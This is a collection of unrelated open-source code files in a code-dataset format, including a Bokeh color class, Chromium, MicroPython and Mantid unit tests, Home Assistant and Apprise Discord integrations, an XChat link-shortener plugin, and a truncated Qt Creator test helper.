hsl = self.to_hsl()
hsl.l = self.clamp(hsl.l + amount, 1)
return self.from_hsl(hsl)
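    # Rough usage sketch (assuming the concrete RGB subclass from
    # bokeh.colors.rgb): RGB(16, 32, 64).lighten(0.2) converts to HSL,
    # raises the luminance by 0.2 (clamped to 1), and converts back, while
    # darken() lowers the luminance (clamped at 0).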
def to_css(self):
''' Return a CSS representation of this color.
*Subclasses must implement this method.*
Returns:
str
'''
raise NotImplementedError
def to_hsl(self):
''' Create a new HSL color by converting from this color.
*Subclasses must implement this method.*
Returns:
HSL
'''
raise NotImplementedError
def to_rgb(self):
''' Create a new HSL color by converting from this color.
*Subclasses must implement this method.*
Returns:
:class:`~bokeh.colors.rgb.RGB`
'''
raise NotImplementedError
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
| bsd-3-clause | 6,358,433,311,000,688,000 | 24.648936 | 82 | 0.412692 | false |
Epirex/android_external_chromium_org | tools/telemetry/telemetry/page/html_page_measurement_results_unittest.py | 23 | 7625 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import StringIO
import unittest
from telemetry.page import html_page_measurement_results
from telemetry.page import page_set
def _MakePageSet():
return page_set.PageSet.FromDict({
"description": "hello",
"archive_path": "foo.wpr",
"pages": [
{"url": "http://www.foo.com/"},
{"url": "http://www.bar.com/"},
{"url": "http://www.baz.com/"}
]
}, os.path.dirname(__file__))
class DeterministicHtmlPageMeasurementResults(
html_page_measurement_results.HtmlPageMeasurementResults):
def _GetBuildTime(self):
return 'build_time'
def _GetRevision(self):
return 'revision'
# Wrap string IO with a .name property so that it behaves more like a file.
class StringIOFile(StringIO.StringIO):
name = 'fake_output_file'
class HtmlPageMeasurementResultsTest(unittest.TestCase):
# TODO(tonyg): Remove this backfill when we can assume python 2.7 everywhere.
def assertIn(self, first, second, _=None):
self.assertTrue(first in second,
msg="'%s' not found in '%s'" % (first, second))
def test_basic_summary(self):
test_page_set = _MakePageSet()
output_file = StringIOFile()
# Run the first time and verify the results are written to the HTML file.
results = DeterministicHtmlPageMeasurementResults(
output_file, 'test_name', False, False, 'browser_type')
results.WillMeasurePage(test_page_set.pages[0])
results.Add('a', 'seconds', 3)
results.DidMeasurePage()
results.AddSuccess(test_page_set.pages[0])
results.WillMeasurePage(test_page_set.pages[1])
results.Add('a', 'seconds', 7)
results.DidMeasurePage()
results.AddSuccess(test_page_set.pages[1])
results.PrintSummary()
results.GetResults()
expected = {
"platform": "browser_type",
"buildTime": "build_time",
"label": None,
"tests": {
"test_name": {
"metrics": {
"a": {
"current": [3, 7],
"units": "seconds",
"important": True
},
"telemetry_page_measurement_results.num_failed": {
"current": [0],
"units": "count",
"important": False
},
"a_by_url.http://www.bar.com/": {
"current": [7],
"units": "seconds",
"important": False
},
"telemetry_page_measurement_results.num_errored": {
"current": [0],
"units": "count",
"important": False
},
"a_by_url.http://www.foo.com/": {
"current": [3],
"units": "seconds",
"important": False
}
}
}
},
"revision": "revision"
}
self.assertEquals(expected, results.GetResults())
# Run the second time and verify the results are appended to the HTML file.
output_file.seek(0)
results = DeterministicHtmlPageMeasurementResults(
output_file, 'test_name', False, False, 'browser_type')
results.WillMeasurePage(test_page_set.pages[0])
results.Add('a', 'seconds', 4)
results.DidMeasurePage()
results.AddSuccess(test_page_set.pages[0])
results.WillMeasurePage(test_page_set.pages[1])
results.Add('a', 'seconds', 8)
results.DidMeasurePage()
results.AddSuccess(test_page_set.pages[1])
results.PrintSummary()
expected = [
{
"platform": "browser_type",
"buildTime": "build_time",
"label": None,
"tests": {
"test_name": {
"metrics": {
"a": {
"current": [3, 7],
"units": "seconds",
"important": True
},
"telemetry_page_measurement_results.num_failed": {
"current": [0],
"units": "count",
"important": False
},
"a_by_url.http://www.bar.com/": {
"current": [7],
"units": "seconds",
"important": False
},
"telemetry_page_measurement_results.num_errored": {
"current": [0],
"units": "count",
"important": False
},
"a_by_url.http://www.foo.com/": {
"current": [3],
"units": "seconds",
"important": False
}
}
}
},
"revision": "revision"
},
{
"platform": "browser_type",
"buildTime": "build_time",
"label": None,
"tests": {
"test_name": {
"metrics": {
"a": {
"current": [4, 8],
"units": "seconds",
"important": True
},
"telemetry_page_measurement_results.num_failed": {
"current": [0],
"units": "count",
"important": False,
},
"a_by_url.http://www.bar.com/": {
"current": [8],
"units": "seconds",
"important": False
},
"telemetry_page_measurement_results.num_errored": {
"current": [0],
"units": "count",
"important": False
},
"a_by_url.http://www.foo.com/": {
"current": [4],
"units": "seconds",
"important": False
}
}
}
},
"revision": "revision"
}]
self.assertEquals(expected, results.GetCombinedResults())
last_output_len = len(output_file.getvalue())
# Now reset the results and verify the old ones are gone.
output_file.seek(0)
results = DeterministicHtmlPageMeasurementResults(
output_file, 'test_name', True, False, 'browser_type')
results.WillMeasurePage(test_page_set.pages[0])
results.Add('a', 'seconds', 5)
results.DidMeasurePage()
results.AddSuccess(test_page_set.pages[0])
results.WillMeasurePage(test_page_set.pages[1])
results.Add('a', 'seconds', 9)
results.DidMeasurePage()
results.AddSuccess(test_page_set.pages[1])
results.PrintSummary()
expected = [{
"platform": "browser_type",
"buildTime": "build_time",
"label": None,
"tests": {
"test_name": {
"metrics": {
"a": {
"current": [5, 9],
"units": "seconds",
"important": True
},
"telemetry_page_measurement_results.num_failed": {
"current": [0],
"units": "count",
"important": False
},
"a_by_url.http://www.bar.com/": {
"current": [9],
"units": "seconds",
"important": False
},
"telemetry_page_measurement_results.num_errored": {
"current": [0],
"units": "count",
"important": False
},
"a_by_url.http://www.foo.com/": {
"current": [5],
"units": "seconds",
"important": False
}
}
}
},
"revision": "revision"
}]
self.assertEquals(expected, results.GetCombinedResults())
self.assertTrue(len(output_file.getvalue()) < last_output_len)
| bsd-3-clause | 7,517,208,105,708,663,000 | 29.62249 | 79 | 0.502164 | false |
amsn/amsn2 | amsn2/ui/front_ends/cocoa/image.py | 2 | 1362 |
from AppKit import *
from amsn2.ui import base
class Image(object):
""" This interface will represent an image to be used by the UI"""
def __init__(self, amsn_core, parent):
"""Initialize the interface. You should store the reference to the core in here """
self._img = NSImage.alloc().initWithSize_((1,1))
def load(self, resource_name, value):
""" This method is used to load an image using the name of a resource and a value for that resource
resource_name can be :
- 'File', value is the filename
- 'Skin', value is the skin key
- some more :)
"""
self._img.release()
if (resource_name == 'File'):
self._img = NSImage.alloc().initWithContentsOfFile_(str(value))
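    # Rough usage sketch (hypothetical path): img.load('File', '/tmp/avatar.png')
    # replaces the current NSImage with one loaded from disk; the 'Skin'
    # resource type is not handled by this backend yet.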
def append(self, resource_name, value):
""" This method is used to overlap an image on the current image
Have a look at the documentation of the 'load' method for the meanings of 'resource_name' and 'value'
"""
raise NotImplementedError
def prepend(self, resource_name, value):
""" This method is used to underlap an image under the current image
Have a look at the documentation of the 'load' method for the meanings of 'resource_name' and 'value'
"""
raise NotImplementedError
| gpl-2.0 | 3,850,015,471,914,863,600 | 40.272727 | 113 | 0.618209 | false |
kerneltask/micropython | tests/micropython/import_mpy_invalid.py | 2 | 1511 | # test importing of invalid .mpy files
try:
import sys, uio, uos
uio.IOBase
uos.mount
except (ImportError, AttributeError):
print("SKIP")
raise SystemExit
class UserFile(uio.IOBase):
def __init__(self, data):
self.data = memoryview(data)
self.pos = 0
def readinto(self, buf):
n = min(len(buf), len(self.data) - self.pos)
buf[:n] = self.data[self.pos : self.pos + n]
self.pos += n
return n
def ioctl(self, req, arg):
return 0
class UserFS:
def __init__(self, files):
self.files = files
def mount(self, readonly, mksfs):
pass
def umount(self):
pass
def stat(self, path):
if path in self.files:
return (32768, 0, 0, 0, 0, 0, 0, 0, 0, 0)
raise OSError
def open(self, path, mode):
return UserFile(self.files[path])
# these are the test .mpy files
user_files = {
"/mod0.mpy": b"", # empty file
"/mod1.mpy": b"M", # too short header
"/mod2.mpy": b"M\x00\x00\x00", # bad version
"/mod3.mpy": b"M\x00\x00\x00\x7f", # qstr window too large
}
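# (For reference, the .mpy header checked above is roughly: b'M', a version
# byte, a feature-flags byte, the number of small-int bits, then a
# variable-length qstr-window size -- hence "bad version" for mod2 and
# "qstr window too large" for mod3.)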
# create and mount a user filesystem
uos.mount(UserFS(user_files), "/userfs")
sys.path.append("/userfs")
# import .mpy files from the user filesystem
for i in range(len(user_files)):
mod = "mod%u" % i
try:
__import__(mod)
except ValueError as er:
print(mod, "ValueError", er)
# unmount and undo path addition
uos.umount("/userfs")
sys.path.pop()
| mit | -3,037,296,073,319,553,500 | 20.898551 | 63 | 0.583719 | false |
sdague/home-assistant | homeassistant/components/lutron_caseta/switch.py | 7 | 1494 | """Support for Lutron Caseta switches."""
import logging
from homeassistant.components.switch import DOMAIN, SwitchEntity
from . import DOMAIN as CASETA_DOMAIN, LutronCasetaDevice
_LOGGER = logging.getLogger(__name__)
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the Lutron Caseta switch platform.
Adds switches from the Caseta bridge associated with the config_entry as
switch entities.
"""
entities = []
bridge = hass.data[CASETA_DOMAIN][config_entry.entry_id]
switch_devices = bridge.get_devices_by_domain(DOMAIN)
for switch_device in switch_devices:
entity = LutronCasetaLight(switch_device, bridge)
entities.append(entity)
async_add_entities(entities, True)
return True
class LutronCasetaLight(LutronCasetaDevice, SwitchEntity):
"""Representation of a Lutron Caseta switch."""
async def async_turn_on(self, **kwargs):
"""Turn the switch on."""
await self._smartbridge.turn_on(self.device_id)
async def async_turn_off(self, **kwargs):
"""Turn the switch off."""
await self._smartbridge.turn_off(self.device_id)
@property
def is_on(self):
"""Return true if device is on."""
return self._device["current_state"] > 0
async def async_update(self):
"""Update when forcing a refresh of the device."""
self._device = self._smartbridge.get_device_by_id(self.device_id)
_LOGGER.debug(self._device)
| apache-2.0 | 3,226,165,471,130,838,000 | 29.489796 | 76 | 0.679384 | false |
JackDandy/SickGear | lib/apprise/plugins/NotifyDiscord.py | 2 | 17395 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2019 Chris Caron <[email protected]>
# All rights reserved.
#
# This code is licensed under the MIT License.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files(the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and / or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions :
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# For this to work correctly you need to create a webhook. To do this just
# click on the little gear icon next to the channel you're part of. From
# here you'll be able to access the Webhooks menu and create a new one.
#
# When you've completed, you'll get a URL that looks a little like this:
# https://discordapp.com/api/webhooks/417429632418316298/\
# JHZ7lQml277CDHmQKMHI8qBe7bk2ZwO5UKjCiOAF7711o33MyqU344Qpgv7YTpadV_js
#
# Simplified, it looks like this:
# https://discordapp.com/api/webhooks/WEBHOOK_ID/WEBHOOK_TOKEN
#
# This plugin will simply work using the url of:
# discord://WEBHOOK_ID/WEBHOOK_TOKEN
#
# API Documentation on Webhooks:
# - https://discordapp.com/developers/docs/resources/webhook
#
import re
import requests
from json import dumps
from .NotifyBase import NotifyBase
from ..common import NotifyImageSize
from ..common import NotifyFormat
from ..common import NotifyType
from ..utils import parse_bool
from ..utils import validate_regex
from ..AppriseLocale import gettext_lazy as _
from ..attachment.AttachBase import AttachBase
class NotifyDiscord(NotifyBase):
"""
A wrapper to Discord Notifications
"""
# The default descriptive name associated with the Notification
service_name = 'Discord'
# The services URL
service_url = 'https://discordapp.com/'
# The default secure protocol
secure_protocol = 'discord'
# A URL that takes you to the setup/help of the specific protocol
setup_url = 'https://github.com/caronc/apprise/wiki/Notify_discord'
# Discord Webhook
notify_url = 'https://discordapp.com/api/webhooks'
# Allows the user to specify the NotifyImageSize object
image_size = NotifyImageSize.XY_256
# The maximum allowable characters allowed in the body per message
body_maxlen = 2000
# Define object templates
templates = (
'{schema}://{webhook_id}/{webhook_token}',
'{schema}://{botname}@{webhook_id}/{webhook_token}',
)
# Define our template tokens
template_tokens = dict(NotifyBase.template_tokens, **{
'botname': {
'name': _('Bot Name'),
'type': 'string',
'map_to': 'user',
},
'webhook_id': {
'name': _('Webhook ID'),
'type': 'string',
'private': True,
'required': True,
},
'webhook_token': {
'name': _('Webhook Token'),
'type': 'string',
'private': True,
'required': True,
},
})
# Define our template arguments
template_args = dict(NotifyBase.template_args, **{
'tts': {
'name': _('Text To Speech'),
'type': 'bool',
'default': False,
},
'avatar': {
'name': _('Avatar Image'),
'type': 'bool',
'default': True,
},
'footer': {
'name': _('Display Footer'),
'type': 'bool',
'default': False,
},
'footer_logo': {
'name': _('Footer Logo'),
'type': 'bool',
'default': True,
},
'image': {
'name': _('Include Image'),
'type': 'bool',
'default': False,
'map_to': 'include_image',
},
})
def __init__(self, webhook_id, webhook_token, tts=False, avatar=True,
footer=False, footer_logo=True, include_image=False,
**kwargs):
"""
Initialize Discord Object
"""
super(NotifyDiscord, self).__init__(**kwargs)
# Webhook ID (associated with project)
self.webhook_id = validate_regex(webhook_id)
if not self.webhook_id:
msg = 'An invalid Discord Webhook ID ' \
'({}) was specified.'.format(webhook_id)
self.logger.warning(msg)
raise TypeError(msg)
# Webhook Token (associated with project)
self.webhook_token = validate_regex(webhook_token)
if not self.webhook_token:
msg = 'An invalid Discord Webhook Token ' \
'({}) was specified.'.format(webhook_token)
self.logger.warning(msg)
raise TypeError(msg)
# Text To Speech
self.tts = tts
# Over-ride Avatar Icon
self.avatar = avatar
# Place a footer
self.footer = footer
# include a footer_logo in footer
self.footer_logo = footer_logo
# Place a thumbnail image inline with the message body
self.include_image = include_image
return
def send(self, body, title='', notify_type=NotifyType.INFO, attach=None,
**kwargs):
"""
Perform Discord Notification
"""
payload = {
# Text-To-Speech
'tts': self.tts,
# If Text-To-Speech is set to True, then we do not want to wait
# for the whole message before continuing. Otherwise, we wait
'wait': self.tts is False,
}
# Acquire image_url
image_url = self.image_url(notify_type)
if self.notify_format == NotifyFormat.MARKDOWN:
# Use embeds for payload
payload['embeds'] = [{
'provider': {
'name': self.app_id,
'url': self.app_url,
},
'title': title,
'type': 'rich',
'description': body,
# Our color associated with our notification
'color': self.color(notify_type, int),
}]
# Break titles out so that we can sort them in embeds
fields = self.extract_markdown_sections(body)
if len(fields) > 0:
# Apply our additional parsing for a better presentation
# Swap first entry for description
payload['embeds'][0]['description'] = \
fields[0].get('name') + fields[0].get('value')
payload['embeds'][0]['fields'] = fields[1:]
if self.footer:
# Acquire logo URL
logo_url = self.image_url(notify_type, logo=True)
# Set Footer text to our app description
payload['embeds'][0]['footer'] = {
'text': self.app_desc,
}
if self.footer_logo and logo_url:
payload['embeds'][0]['footer']['icon_url'] = logo_url
if self.include_image and image_url:
payload['embeds'][0]['thumbnail'] = {
'url': image_url,
'height': 256,
'width': 256,
}
else:
# not markdown
payload['content'] = \
body if not title else "{}\r\n{}".format(title, body)
if self.avatar and image_url:
payload['avatar_url'] = image_url
if self.user:
# Optionally override the default username of the webhook
payload['username'] = self.user
if not self._send(payload):
# We failed to post our message
return False
if attach:
            # Update our payload; the idea is to preserve its other detected
# and assigned values for re-use here too
payload.update({
# Text-To-Speech
'tts': False,
# Wait until the upload has posted itself before continuing
'wait': True,
})
# Remove our text/title based content for attachment use
if 'embeds' in payload:
# Markdown
del payload['embeds']
if 'content' in payload:
# Markdown
del payload['content']
# Send our attachments
for attachment in attach:
self.logger.info(
'Posting Discord Attachment {}'.format(attachment.name))
if not self._send(payload, attach=attachment):
# We failed to post our message
return False
# Otherwise return
return True
def _send(self, payload, attach=None, **kwargs):
"""
Wrapper to the requests (post) object
"""
# Our headers
headers = {
'User-Agent': self.app_id,
}
# Construct Notify URL
notify_url = '{0}/{1}/{2}'.format(
self.notify_url,
self.webhook_id,
self.webhook_token,
)
self.logger.debug('Discord POST URL: %s (cert_verify=%r)' % (
notify_url, self.verify_certificate,
))
self.logger.debug('Discord Payload: %s' % str(payload))
# Always call throttle before any remote server i/o is made
self.throttle()
# Perform some simple error checking
if isinstance(attach, AttachBase):
if not attach:
# We could not access the attachment
self.logger.error(
'Could not access attachment {}.'.format(
attach.url(privacy=True)))
return False
self.logger.debug(
'Posting Discord attachment {}'.format(
attach.url(privacy=True)))
# Our attachment path (if specified)
files = None
try:
# Open our attachment path if required:
if attach:
files = {'file': (attach.name, open(attach.path, 'rb'))}
else:
headers['Content-Type'] = 'application/json; charset=utf-8'
r = requests.post(
notify_url,
data=payload if files else dumps(payload),
headers=headers,
files=files,
verify=self.verify_certificate,
)
if r.status_code not in (
requests.codes.ok, requests.codes.no_content):
# We had a problem
status_str = \
NotifyBase.http_response_code_lookup(r.status_code)
self.logger.warning(
'Failed to send {}to Discord notification: '
'{}{}error={}.'.format(
attach.name if attach else '',
status_str,
', ' if status_str else '',
r.status_code))
self.logger.debug('Response Details:\r\n{}'.format(r.content))
# Return; we're done
return False
else:
self.logger.info('Sent Discord {}.'.format(
'attachment' if attach else 'notification'))
except requests.RequestException as e:
self.logger.warning(
                'A Connection error occurred posting {}to Discord.'.format(
attach.name if attach else ''))
self.logger.debug('Socket Exception: %s' % str(e))
return False
except (OSError, IOError) as e:
self.logger.warning(
                'An I/O error occurred while reading {}.'.format(
attach.name if attach else 'attachment'))
self.logger.debug('I/O Exception: %s' % str(e))
return False
finally:
# Close our file (if it's open) stored in the second element
# of our files tuple (index 1)
if files:
files['file'][1].close()
return True
def url(self, privacy=False, *args, **kwargs):
"""
Returns the URL built dynamically based on specified arguments.
"""
# Define any arguments set
args = {
'format': self.notify_format,
'overflow': self.overflow_mode,
'tts': 'yes' if self.tts else 'no',
'avatar': 'yes' if self.avatar else 'no',
'footer': 'yes' if self.footer else 'no',
'footer_logo': 'yes' if self.footer_logo else 'no',
'image': 'yes' if self.include_image else 'no',
'verify': 'yes' if self.verify_certificate else 'no',
}
return '{schema}://{webhook_id}/{webhook_token}/?{args}'.format(
schema=self.secure_protocol,
webhook_id=self.pprint(self.webhook_id, privacy, safe=''),
webhook_token=self.pprint(self.webhook_token, privacy, safe=''),
args=NotifyDiscord.urlencode(args),
)
@staticmethod
def parse_url(url):
"""
Parses the URL and returns enough arguments that can allow
us to substantiate this object.
Syntax:
discord://webhook_id/webhook_token
"""
results = NotifyBase.parse_url(url)
if not results:
# We're done early as we couldn't load the results
return results
# Store our webhook ID
webhook_id = NotifyDiscord.unquote(results['host'])
# Now fetch our tokens
try:
webhook_token = \
NotifyDiscord.split_path(results['fullpath'])[0]
except IndexError:
# Force some bad values that will get caught
# in parsing later
webhook_token = None
results['webhook_id'] = webhook_id
results['webhook_token'] = webhook_token
# Text To Speech
results['tts'] = parse_bool(results['qsd'].get('tts', False))
# Use Footer
results['footer'] = parse_bool(results['qsd'].get('footer', False))
# Use Footer Logo
results['footer_logo'] = \
parse_bool(results['qsd'].get('footer_logo', True))
# Update Avatar Icon
results['avatar'] = parse_bool(results['qsd'].get('avatar', True))
# Use Thumbnail
if 'thumbnail' in results['qsd']:
            # Deprecation Notice issued for v0.7.5
NotifyDiscord.logger.deprecate(
'The Discord URL contains the parameter '
'"thumbnail=" which will be deprecated in an upcoming '
'release. Please use "image=" instead.'
)
# use image= for consistency with the other plugins but we also
# support thumbnail= for backwards compatibility.
results['include_image'] = \
parse_bool(results['qsd'].get(
'image', results['qsd'].get('thumbnail', False)))
return results
@staticmethod
def parse_native_url(url):
"""
Support https://discordapp.com/api/webhooks/WEBHOOK_ID/WEBHOOK_TOKEN
"""
result = re.match(
r'^https?://discordapp\.com/api/webhooks/'
r'(?P<webhook_id>[0-9]+)/'
r'(?P<webhook_token>[A-Z0-9_-]+)/?'
r'(?P<args>\?.+)?$', url, re.I)
if result:
return NotifyDiscord.parse_url(
'{schema}://{webhook_id}/{webhook_token}/{args}'.format(
schema=NotifyDiscord.secure_protocol,
webhook_id=result.group('webhook_id'),
webhook_token=result.group('webhook_token'),
args='' if not result.group('args')
else result.group('args')))
return None
@staticmethod
def extract_markdown_sections(markdown):
"""
Takes a string in a markdown type format and extracts
the headers and their corresponding sections into individual
fields that get passed as an embed entry to Discord.
"""
regex = re.compile(
r'\s*#[# \t\v]*(?P<name>[^\n]+)(\n|\s*$)'
r'\s*((?P<value>[^#].+?)(?=\s*$|[\r\n]+\s*#))?', flags=re.S)
common = regex.finditer(markdown)
fields = list()
for el in common:
d = el.groupdict()
fields.append({
'name': d.get('name', '').strip('# \r\n\t\v'),
'value': '```md\n' +
(d.get('value').strip() if d.get('value') else '') + '\n```'
})
return fields
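    # Rough illustration (hypothetical input): a body such as
    #   "# Header\nsome text"
    # would come back as
    #   [{'name': 'Header', 'value': '```md\nsome text\n```'}]
    # so each markdown section becomes one embed field.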
| gpl-3.0 | -2,154,137,183,837,371,400 | 32.133333 | 79 | 0.539983 | false |
peterfpeterson/mantid | Framework/PythonInterface/test/python/plugins/algorithms/WorkflowAlgorithms/SwapWidthsTest.py | 3 | 3004 | # Mantid Repository : https://github.com/mantidproject/mantid
#
# Copyright © 2018 ISIS Rutherford Appleton Laboratory UKRI,
# NScD Oak Ridge National Laboratory, European Spallation Source,
# Institut Laue - Langevin & CSNS, Institute of High Energy Physics, CAS
# SPDX - License - Identifier: GPL - 3.0 +
import unittest
from mantid.simpleapi import *
from mantid.api import MatrixWorkspace, WorkspaceGroup
class SwapWidthsTest(unittest.TestCase):
_input_ws = 'IN16B_125878_QLd_Result'
_swap_point = 5
def setUp(self):
self._input_ws = Load(Filename='IN16B_125878_QLd_Result.nxs', OutputWorkspace=self._input_ws)
def _validate_result_shape(self, result):
"""
Validates that the result workspace is of the correct type, units and shape.
@param result Result workspace from SwapWidths algorithm
"""
self.assertTrue(isinstance(result, MatrixWorkspace))
self.assertEqual(result.getNumberHistograms(), 2)
self.assertEqual(result.blocksize(), self._input_ws.blocksize())
self.assertEqual(result.getAxis(0).getUnit().unitID(), 'MomentumTransfer')
self.assertEqual(result.getAxis(1).label(0), 'f2.f1.FWHM')
self.assertEqual(result.getAxis(1).label(1), 'f2.f2.FWHM')
def _validate_result_values(self, result):
"""
Validates the result workspace has the expected values to a realistic number of significant figures.
@param result :: The Result workspace from SwapWidths algorithm
"""
# Get f2.f1/2.FWHM axis numbers
# f2.f1.FWHM = first_fwhm, f2.f2.FWHM = second_fwhm
first_fwhm_idx = 0
second_fwhm_idx = 0
        for i in range(0, self._input_ws.getNumberHistograms() - 1):
if self._input_ws.getAxis(1).label(i) == 'f2.f1.FWHM':
first_fwhm_idx = i
if self._input_ws.getAxis(1).label(i) == 'f2.f2.FWHM':
second_fwhm_idx = i
# Get Y Data for input/result
in_first_fwhm = self._input_ws.dataY(first_fwhm_idx)
in_second_fwhm = self._input_ws.dataY(second_fwhm_idx)
result_first_fwhm = result.dataY(0)
result_second_fwhm = result.dataY(1)
# Check data is correct after swap
for i in range(0, len(in_first_fwhm)):
if i <= self._swap_point:
self.assertEqual(in_first_fwhm[i], result_first_fwhm[i])
self.assertEqual(in_second_fwhm[i], result_second_fwhm[i])
else:
self.assertEqual(in_first_fwhm[i], result_second_fwhm[i])
self.assertEqual(in_second_fwhm[i], result_first_fwhm[i])
def test_basic(self):
"""
Tests a basic run of SwapWidths.
"""
result = SwapWidths(InputWorkspace=self._input_ws,
SwapPoint=self._swap_point)
self._validate_result_shape(result)
self._validate_result_values(result)
if __name__=="__main__":
unittest.main()
| gpl-3.0 | 8,340,603,536,086,600,000 | 37.025316 | 108 | 0.629161 | false |
Jake0720/XChat-Scripts | short.py | 1 | 3543 | __module_name__ = 'Short'
__module_version__ = '1.0'
__module_description__ = 'Auto link shortener with http://links.ml'
__module_author__ = 'Liam Stanley'
import xchat
import urllib, re
c = '\x0304'
help = ("/short <url|enable|disable>\n"
" - url: url/link that you would like to be shortened. E.g, http://liamstanley.io\n"
" - enable: Enable the auto conversion of links that you enter in the input box.\n"
" Remember, only correct URLs will be converted, and links in commands\n"
" will be ignored.\n"
" - disable: Disable the auto conversion of URLs that are entered in the input box.\n"
" [NOTE]: Use your notepad enter key to sent text without conversion, temporarily.")
def post(query):
data = urllib.urlencode(query)
u = urllib.urlopen('http://links.ml/submit', data)
bytes = u.read()
u.close()
return bytes
def shorten(url):
try:
data = post({'api': True, 'link': url})
if 'bad request' in data.lower(): return
return data
except: return
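# Illustrative note (assumes the links.ml endpoint behaves the way the code
# above expects): shorten('http://example.com') should hand back the shortened
# link returned by the service, or None when the request fails or the reply
# contains 'bad request'.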
def send_message(word, word_eol, userdata):
"""Gets the inputbox's text, replace URL's with shortened URLs.
This function is called every time a key is pressed. It will stop if that
key isn't Enter or if the input box is empty.
KP_Return (keypad Enter key) is ignored, and can be used if you don't want
a URL to be shortened.
"""
if not prefs('get'):
return
if not(word[0] == "65293"): return
msg = xchat.get_info('inputbox')
if msg is None: return
if msg.startswith('/'): return
urls = re.findall('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', msg)
if not urls: return
for url in urls:
try:
data = shorten(url)
if not data: continue
msg = msg.replace(url, str(data))
except: continue
xchat.command("settext %s" % msg)
return xchat.EAT_ALL
def short(word, word_eol, userdata):
"""shortens the url passed as an arguement."""
try:
if len(word) == 1:
return xchat.prnt(help)
if word_eol[1].lower() in ['on', 'enable', 'true']:
prefs('put', 'on')
return
elif word_eol[1].lower() in ['off', 'disable', 'false']:
prefs('put', 'off')
return
else:
url = re.findall('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', word_eol[1])
if not url: return xchat.prnt(help)
url = url[0]
data = shorten(url)
if not data: return xchat.prnt(help)
new = word_eol[1].replace(url, str(data))
xchat.command('say %s' % new)
except:
xchat.prnt(help)
return xchat.EAT_ALL
def prefs(job, args=None):
"""Saves|Gets preferences."""
if job == 'get':
status = xchat.get_pluginpref("shorten_status")
# Get data from database
if not status: return True
else:
if status == 'on': return True
else: return False
if job == 'put' and args:
xchat.set_pluginpref("shorten_status", args)
xchat.prnt("Preferences saved.")
def onUnload(userdata):
xchat.prnt('%s%s has been unloaded.' % (c, __module_name__))
xchat.hook_print('Key Press', send_message)
xchat.hook_command("short", short, help=help)
xchat.hook_unload(onUnload)
print('%s%s Version %s has been loaded.' % (c, __module_name__, __module_version__))
| mit | 9,194,640,254,899,396,000 | 33.067308 | 123 | 0.570421 | false |
colede/qtcreator | tests/system/shared/hook_utils.py | 2 | 21179 | #############################################################################
##
## Copyright (C) 2014 Digia Plc and/or its subsidiary(-ies).
## Contact: http://www.qt-project.org/legal
##
## This file is part of Qt Creator.
##
## Commercial License Usage
## Licensees holding valid commercial Qt licenses may use this file in
## accordance with the commercial license agreement provided with the
## Software or, alternatively, in accordance with the terms contained in
## a written agreement between you and Digia. For licensing terms and
## conditions see http://qt.digia.com/licensing. For further information
## use the contact form at http://qt.digia.com/contact-us.
##
## GNU Lesser General Public License Usage
## Alternatively, this file may be used under the terms of the GNU Lesser
## General Public License version 2.1 as published by the Free Software
## Foundation and appearing in the file LICENSE.LGPL included in the
## packaging of this file. Please review the following information to
## ensure the GNU Lesser General Public License version 2.1 requirements
## will be met: http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html.
##
## In addition, as a special exception, Digia gives you certain additional
## rights. These rights are described in the Digia Qt LGPL Exception
## version 1.1, included in the file LGPL_EXCEPTION.txt in this package.
##
#############################################################################
import re
# this function modifies all necessary run settings to make it possible to hook into
# the application compiled by Creator
def modifyRunSettingsForHookInto(projectName, kitCount, port):
prepareBuildSettings(kitCount, 0)
# this uses the default Qt version which Creator activates when opening the project
switchViewTo(ViewConstants.PROJECTS)
switchToBuildOrRunSettingsFor(kitCount, 0, ProjectSettings.BUILD)
qtVersion, mkspec, qtBinPath, qtLibPath = getQtInformationForBuildSettings(kitCount, True)
if None in (qtVersion, mkspec, qtBinPath, qtLibPath):
test.fatal("At least one of the Qt information returned None - leaving...",
"Qt version: %s, mkspec: %s, Qt BinPath: %s, Qt LibPath: %s" %
(qtVersion, mkspec, qtBinPath, qtLibPath))
return False
qtVersion = ".".join(qtVersion.split(".")[:2])
switchToBuildOrRunSettingsFor(kitCount, 0, ProjectSettings.RUN)
result = __configureCustomExecutable__(projectName, port, mkspec, qtVersion)
if result:
ensureChecked(":RunSettingsEnvironmentDetails_Utils::DetailsButton")
envVarsTableView = waitForObject("{type='QTableView' visible='1' unnamed='1'}")
model = envVarsTableView.model()
changingVars = []
for index in dumpIndices(model):
# get var name
envVarsTableView.scrollTo(index)
varName = str(model.data(index).toString())
            # if it's a special SQUISH var, simply unset it; SQUISH_LIBQTDIR and PATH will be replaced with Qt paths
if varName == "PATH":
test.log("Replacing PATH with '%s'" % qtBinPath)
changingVars.append("PATH=%s" % qtBinPath)
elif varName.find("SQUISH") == 0:
if varName == "SQUISH_LIBQTDIR":
if platform.system() in ('Microsoft', 'Windows'):
replacement = qtBinPath
else:
replacement = qtLibPath
